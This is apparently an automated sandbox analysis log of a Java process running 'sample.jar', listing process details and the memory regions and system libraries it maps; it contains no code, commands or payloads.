# Flog Txt Version 1 # Analyzer Version: 4.4.1 # Analyzer Build Date: Jan 14 2022 06:06:11 # Log Creation Date: 18.01.2022 16:38:56.034 Process: id = "1" image_name = "java.exe" filename = "c:\\program files\\java\\jre1.8.0_171\\bin\\java.exe" page_root = "0x59adb000" os_pid = "0x1250" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x5d0" cmd_line = "\"C:\\Program Files\\Java\\jre1.8.0_171\\bin\\java.exe\" -jar \"C:\\Users\\RDHJ0C~1\\Desktop\\sample.jar\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e839" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 118 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 119 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 120 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 121 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 122 start_va = 0x160000 end_va = 0x162fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 123 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 124 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 125 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 126 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 127 start_va = 0x7ff7d5e70000 end_va = 0x7ff7d5ea6fff monitored = 0 entry_point = 0x7ff7d5e7aa20 region_type = mapped_file name = "java.exe" filename = "\\Program Files\\Java\\jre1.8.0_171\\bin\\java.exe" (normalized: "c:\\program files\\java\\jre1.8.0_171\\bin\\java.exe") Region: id = 128 start_va = 0x7ffb61c50000 end_va = 0x7ffb61e10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 266 start_va = 0x410000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 267 start_va = 0x7ffb5ee60000 end_va = 0x7ffb5f047fff monitored = 0 entry_point = 0x7ffb5ee8ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 268 start_va = 0x7ffb60950000 end_va = 0x7ffb609fcfff monitored = 0 entry_point = 0x7ffb609681a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 269 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 270 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 271 start_va = 0x510000 end_va = 0x5cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 354 start_va = 0x7ffb60d00000 end_va = 0x7ffb60da6fff monitored = 0 entry_point = 0x7ffb60d158d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 355 start_va = 0x7ffb60e10000 end_va = 0x7ffb60eacfff monitored = 0 entry_point = 0x7ffb60e178a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 356 start_va = 0x5d0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 357 start_va = 0x7ffb61960000 end_va = 0x7ffb619bafff monitored = 0 entry_point = 0x7ffb619738b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 358 start_va = 0x7ffb60830000 end_va = 0x7ffb6094bfff monitored = 0 entry_point = 0x7ffb608702b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 359 start_va = 0x7ffb60b10000 end_va = 0x7ffb60c65fff monitored = 0 entry_point = 0x7ffb60b1a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 360 start_va = 0x7ffb61690000 end_va = 0x7ffb61815fff monitored = 0 entry_point = 0x7ffb616dffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 361 start_va = 0x7ffb557f0000 end_va = 0x7ffb55a63fff monitored = 0 entry_point = 0x7ffb55860400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 362 start_va = 0x7ffb5f050000 end_va = 0x7ffb5f2ccfff monitored = 0 entry_point = 0x7ffb5f124970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 363 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 364 start_va = 0x7ffb5ebd0000 end_va = 0x7ffb5ec39fff monitored = 0 entry_point = 0x7ffb5ec06d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 365 start_va = 0x6d0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 366 start_va = 0x180000 end_va = 0x186fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 367 start_va = 0x190000 end_va = 0x1c8fff monitored = 0 entry_point = 0x1912f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 368 start_va = 0x6d0000 end_va = 0x857fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 369 start_va = 0x890000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 370 start_va = 0x7ffb615a0000 end_va = 0x7ffb615dafff monitored = 0 entry_point = 0x7ffb615a12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 371 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 372 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 373 start_va = 0x8a0000 end_va = 0xa20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 374 start_va = 0xa30000 end_va = 0x1e2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 375 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 376 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 377 start_va = 0x1e30000 end_va = 0x1f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 378 start_va = 0x1e30000 end_va = 0x1f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 379 start_va = 0x1f80000 end_va = 0x1f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 381 start_va = 0x6fde0000 end_va = 0x6feb1fff monitored = 0 entry_point = 0x6fe014e4 region_type = mapped_file name = "msvcr100.dll" filename = "\\Program Files\\Java\\jre1.8.0_171\\bin\\msvcr100.dll" (normalized: "c:\\program files\\java\\jre1.8.0_171\\bin\\msvcr100.dll") Region: id = 382 start_va = 0x1f90000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 383 start_va = 0x6f540000 end_va = 0x6fddffff monitored = 0 entry_point = 0x6fb19780 region_type = mapped_file name = "jvm.dll" filename = "\\Program Files\\Java\\jre1.8.0_171\\bin\\server\\jvm.dll" (normalized: "c:\\program files\\java\\jre1.8.0_171\\bin\\server\\jvm.dll") Region: id = 384 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 385 start_va = 0x7ffb61a20000 end_va = 0x7ffb61a27fff monitored = 0 entry_point = 0x7ffb61a210b0 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 386 start_va = 0x7ffb529d0000 end_va = 0x7ffb529d9fff monitored = 0 entry_point = 0x7ffb529d1350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 387 start_va = 0x7ffb56950000 end_va = 0x7ffb56958fff monitored = 0 entry_point = 0x7ffb56951330 region_type = mapped_file name = "wsock32.dll" filename = "\\Windows\\System32\\wsock32.dll" (normalized: "c:\\windows\\system32\\wsock32.dll") Region: id = 388 start_va = 0x7ffb5b8d0000 end_va = 0x7ffb5b8fbfff monitored = 0 entry_point = 0x7ffb5b8d8210 region_type = mapped_file name = "winmmbase.dll" filename = "\\Windows\\System32\\winmmbase.dll" (normalized: "c:\\windows\\system32\\winmmbase.dll") Region: id = 389 start_va = 0x7ffb5c980000 end_va = 0x7ffb5c9a2fff monitored = 0 entry_point = 0x7ffb5c983670 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 390 start_va = 0x7ffb5eca0000 end_va = 0x7ffb5ece2fff monitored = 0 entry_point = 0x7ffb5ecb4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 391 start_va = 0x7ffb61a30000 end_va = 0x7ffb61a9afff monitored = 0 entry_point = 0x7ffb61a490c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 392 start_va = 0x1d0000 end_va = 0x1d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 393 start_va = 0x1f90000 end_va = 0x208ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 394 start_va = 0x20f0000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 395 start_va = 0x6f530000 end_va = 0x6f53efff monitored = 1 entry_point = 0x6f536de0 region_type = mapped_file name = "verify.dll" filename = "\\Program Files\\Java\\jre1.8.0_171\\bin\\verify.dll" (normalized: "c:\\program files\\java\\jre1.8.0_171\\bin\\verify.dll") Region: id = 396 start_va = 0x6f500000 end_va = 0x6f528fff monitored = 1 entry_point = 0x6f51959c region_type = mapped_file name = "java.dll" filename = "\\Program Files\\Java\\jre1.8.0_171\\bin\\java.dll" (normalized: "c:\\program files\\java\\jre1.8.0_171\\bin\\java.dll") Region: id = 397 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 398 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 399 start_va = 0x2100000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 400 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "4688" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\hsperfdata_RDhJ0CNFevzX\\4688" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\hsperfdata_rdhj0cnfevzx\\4688") Region: id = 401 start_va = 0x6f4e0000 end_va = 0x6f4f5fff monitored = 1 entry_point = 0x6f4eb4a0 region_type = mapped_file name = "zip.dll" filename = "\\Program Files\\Java\\jre1.8.0_171\\bin\\zip.dll" (normalized: "c:\\program files\\java\\jre1.8.0_171\\bin\\zip.dll") Region: id = 402 start_va = 0x2200000 end_va = 0x111fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 403 start_va = 0x11200000 end_va = 0x115bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011200000" filename = "" Region: id = 404 start_va = 0xc0000000 end_va = 0xffffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000c0000000" filename = "" Region: id = 405 start_va = 0x115c0000 end_va = 0x117cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000115c0000" filename = "" Region: id = 406 start_va = 0x117d0000 end_va = 0x1192ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000117d0000" filename = "" Region: id = 407 start_va = 0x100000000 end_va = 0x13fffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000100000000" filename = "" Region: id = 408 start_va = 0x11930000 end_va = 0x1212ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011930000" filename = "" Region: id = 409 start_va = 0x12130000 end_va = 0x1232ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012130000" filename = "" Region: id = 410 start_va = 0x12330000 end_va = 0x12503fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012330000" filename = "" Region: id = 411 start_va = 0x12330000 end_va = 0x1242ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012330000" filename = "" Region: id = 412 start_va = 0x12430000 end_va = 0x1252ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012430000" filename = "" Region: id = 413 start_va = 0x12530000 end_va = 0x1262ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012530000" filename = "" Region: id = 414 start_va = 0x860000 end_va = 0x861fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 415 start_va = 0x870000 end_va = 0x870fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 416 start_va = 0x12630000 end_va = 0x1270ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernel32.dll.mui" filename = "\\Windows\\System32\\en-US\\kernel32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernel32.dll.mui") Region: id = 417 start_va = 0x7ffb5f2d0000 end_va = 0x7ffb6082efff monitored = 0 entry_point = 0x7ffb5f4311f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 418 start_va = 0x7ffb5e560000 end_va = 0x7ffb5eba3fff monitored = 0 entry_point = 0x7ffb5e7264b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 419 start_va = 0x7ffb61820000 end_va = 0x7ffb61871fff monitored = 0 entry_point = 0x7ffb6182f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 420 start_va = 0x7ffb5e2c0000 end_va = 0x7ffb5e2cefff monitored = 0 entry_point = 0x7ffb5e2c3210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 421 start_va = 0x7ffb5ecf0000 end_va = 0x7ffb5eda4fff monitored = 0 entry_point = 0x7ffb5ed322e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 422 start_va = 0x7ffb5e270000 end_va = 0x7ffb5e2bafff monitored = 0 entry_point = 0x7ffb5e2735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 423 start_va = 0x7ffb5e2d0000 end_va = 0x7ffb5e2e3fff monitored = 0 entry_point = 0x7ffb5e2d52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 424 start_va = 0x880000 end_va = 0x880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 425 start_va = 0x12710000 end_va = 0x1280ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012710000" filename = "" Region: id = 426 start_va = 0x12810000 end_va = 0x1290ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012810000" filename = "" Region: id = 427 start_va = 0x12910000 end_va = 0x12a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012910000" filename = "" Region: id = 428 start_va = 0x12a10000 end_va = 0x12b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012a10000" filename = "" Region: id = 429 start_va = 0x12b10000 end_va = 0x12c0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012b10000" filename = "" Region: id = 430 start_va = 0x12c10000 end_va = 0x12d0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012c10000" filename = "" Region: id = 431 start_va = 0x12d10000 end_va = 0x1310ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012d10000" filename = "" Region: id = 432 start_va = 0x6f4b0000 end_va = 0x6f4d3fff monitored = 0 entry_point = 0x6f4c1434 region_type = mapped_file name = "sunec.dll" filename = "\\Program Files\\Java\\jre1.8.0_171\\bin\\sunec.dll" (normalized: "c:\\program files\\java\\jre1.8.0_171\\bin\\sunec.dll") Region: id = 433 start_va = 0x6f490000 end_va = 0x6f4a9fff monitored = 1 entry_point = 0x6f49f3b0 region_type = mapped_file name = "net.dll" filename = "\\Program Files\\Java\\jre1.8.0_171\\bin\\net.dll" (normalized: "c:\\program files\\java\\jre1.8.0_171\\bin\\net.dll") Region: id = 434 start_va = 0x7ffb5db40000 end_va = 0x7ffb5db9bfff monitored = 0 entry_point = 0x7ffb5db56f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 435 start_va = 0x7ffb57360000 end_va = 0x7ffb57397fff monitored = 0 entry_point = 0x7ffb57378cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 436 start_va = 0x7ffb61590000 end_va = 0x7ffb61597fff monitored = 0 entry_point = 0x7ffb61591ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 437 start_va = 0x7ffb56d00000 end_va = 0x7ffb56d15fff monitored = 0 entry_point = 0x7ffb56d019f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 438 start_va = 0x7ffb56ce0000 end_va = 0x7ffb56cf9fff monitored = 0 entry_point = 0x7ffb56ce2430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 439 start_va = 0x6f470000 end_va = 0x6f480fff monitored = 1 entry_point = 0x6f477828 region_type = mapped_file name = "nio.dll" filename = "\\Program Files\\Java\\jre1.8.0_171\\bin\\nio.dll" (normalized: "c:\\program files\\java\\jre1.8.0_171\\bin\\nio.dll") Region: id = 440 start_va = 0x13110000 end_va = 0x1390ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013110000" filename = "" Region: id = 441 start_va = 0x7ffb5caa0000 end_va = 0x7ffb5cb18fff monitored = 0 entry_point = 0x7ffb5cabfb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 442 start_va = 0x7ff5ffb20000 end_va = 0x7ff5ffec0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 463 start_va = 0x6f2d0000 end_va = 0x6f467fff monitored = 1 entry_point = 0x6f3aeb10 region_type = mapped_file name = "awt.dll" filename = "\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_171\\bin\\awt.dll") Region: id = 469 start_va = 0x7ffb61880000 end_va = 0x7ffb61940fff monitored = 0 entry_point = 0x7ffb618a0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 470 start_va = 0x13910000 end_va = 0x13a52fff monitored = 0 entry_point = 0x13938210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 471 start_va = 0x13910000 end_va = 0x139effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 494 start_va = 0x139f0000 end_va = 0x13aeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000139f0000" filename = "" Region: id = 495 start_va = 0x13af0000 end_va = 0x13beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013af0000" filename = "" Region: id = 497 start_va = 0x13bf0000 end_va = 0x13ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013bf0000" filename = "" Region: id = 498 start_va = 0x7ffb5cbf0000 end_va = 0x7ffb5cc85fff monitored = 0 entry_point = 0x7ffb5cc15570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 499 start_va = 0x13cf0000 end_va = 0x13e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013cf0000" filename = "" Region: id = 503 start_va = 0x7ffb61430000 end_va = 0x7ffb61589fff monitored = 0 entry_point = 0x7ffb614738e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 504 start_va = 0x1f30000 end_va = 0x1f30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f30000" filename = "" Region: id = 505 start_va = 0x13cf0000 end_va = 0x13dabfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013cf0000" filename = "" Region: id = 506 start_va = 0x13e80000 end_va = 0x13e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013e80000" filename = "" Region: id = 507 start_va = 0x1f30000 end_va = 0x1f33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f30000" filename = "" Region: id = 508 start_va = 0x7ffb5c200000 end_va = 0x7ffb5c221fff monitored = 0 entry_point = 0x7ffb5c201a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 509 start_va = 0x7ffb612e0000 end_va = 0x7ffb61422fff monitored = 0 entry_point = 0x7ffb61308210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 510 start_va = 0x13e90000 end_va = 0x13f6cfff monitored = 0 entry_point = 0x13eee0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 512 start_va = 0x13e90000 end_va = 0x141c6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 514 start_va = 0x141d0000 end_va = 0x142cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000141d0000" filename = "" Region: id = 515 start_va = 0x7ffb5c740000 end_va = 0x7ffb5c8c5fff monitored = 0 entry_point = 0x7ffb5c78d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 516 start_va = 0x1f40000 end_va = 0x1f40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f40000" filename = "" Region: id = 517 start_va = 0x7ffb615e0000 end_va = 0x7ffb61686fff monitored = 0 entry_point = 0x7ffb615eb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 519 start_va = 0x1f50000 end_va = 0x1f50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f50000" filename = "" Region: id = 520 start_va = 0x1f60000 end_va = 0x1f63fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 521 start_va = 0x2090000 end_va = 0x20d4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 522 start_va = 0x1f70000 end_va = 0x1f73fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 523 start_va = 0x13af0000 end_va = 0x13b7dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 524 start_va = 0x142d0000 end_va = 0x146cafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000142d0000" 